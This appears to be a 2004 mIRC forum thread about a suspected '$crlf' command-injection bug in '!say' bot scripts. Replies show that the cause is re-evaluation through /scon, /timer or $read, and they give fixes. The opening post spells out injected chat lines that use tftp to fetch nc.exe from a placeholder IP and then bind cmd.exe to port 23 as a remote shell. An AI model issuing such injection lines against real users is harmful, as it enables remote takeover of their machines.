mIRC Homepage
Posted By: Grumpy $crlf bug - 10/07/04 04:45 AM
I just found a bug on MIRC on users with !say commands activated.
The bug includes remote execution of commands using $crlf
example if someone has !say script running.
!say something $crlf join #123
and the script will only say something, then execute the /join command after that.

This could be major if someone dont have /run locked.
someone could get total control of a pc with two lines
!say test $crlf run tftp -i <ip> get nc.exe
!say test $crlf run nc.exe -l -p 23 -e cmd.exe
voila! you got instant access on port 23!
other bugs include $chr(13)
even get the passwords in you client with !say %passwd or something.

Posted By: ScatMan Re: $crlf bug - 10/07/04 05:02 AM
that is not a bug, $crlf specifies the end of command when the server reads it.
also, your example with the run won't work because it will send run to the server rather then executing it on mirc
Posted By: Danthemandoo Re: $crlf bug - 10/07/04 06:01 AM
Did a little test...here are the results:

(6:59am) <baddie> !say something $crlf join #123
(6:59am) <averageuser> something $crlf join #123

$crlf is perfectly safe.

Used this script btw:
Code:
on *:text:!say *:#: { 
  msg $chan $2-
}
Posted By: ScatMan Re: $crlf bug - 10/07/04 02:26 PM
yes, also it will join the channel only if you evaluate $($1-,2) which not recommended
Posted By: MTec89 Re: $crlf bug - 10/07/04 03:09 PM
you shouldnt store your password any way.
Posted By: qwerty Re: $crlf bug - 10/07/04 03:19 PM
There's no bug here. My guess is that you're using /scon (or /scid), probably to relay messages to a channel on another network. Passing $1- to /scon has the side-effects that you mentioned because /scon re-evaluates the parameters passed to it. Use something like
Code:
var %a = $1-
scon N msg #somechannel [color:blue]% $+ a[/color]
or
Code:
scon N
msg #somechannel $1-
scon -r
/timer behaves the same way as /scon (re-evaluates the parameters passed to it each time it fires), so you need to watch out for that too.
Posted By: Grumpy Re: $crlf bug - 14/07/04 01:24 PM
hey, thanks, i never thought this much get replies. Anyways, thanks for all the feedback. I worked it out. Actually i was using $read(filename.txt , %linenumber)
cause i allow certain users to add descriptions to stuffs with my bot and add it to a text file. I used $replace to add a - to words with $ and %. Anyways to Scatman.That's exactly what i ended up finding out after playing with it. So i guess it's not that serious. grin Anyways, thanks for all the feedbacks again.
Posted By: qwerty Re: $crlf bug - 14/07/04 02:44 PM
Ah, in the case of $read, you can just use the n switch to avoid re-evaluation of the line contents:
Code:
$read(file.txt,n,%linenumber)
$read(file.txt,N) acts as $eval($read(file.txt,n,N),2).

Btw, $(string,N) (mentioned by ScatMan) and $eval(string,N) are equivalent.
Posted By: Grumpy Re: $crlf bug - 15/07/04 01:05 PM
ah cool, thanks for the info man!!
I have already edited my bot's script, and patched it the hard way replacing all $'s in the descriptions.
I guess i can put it back on when i finish my bot's next version, grin
© mIRC Discussion Forums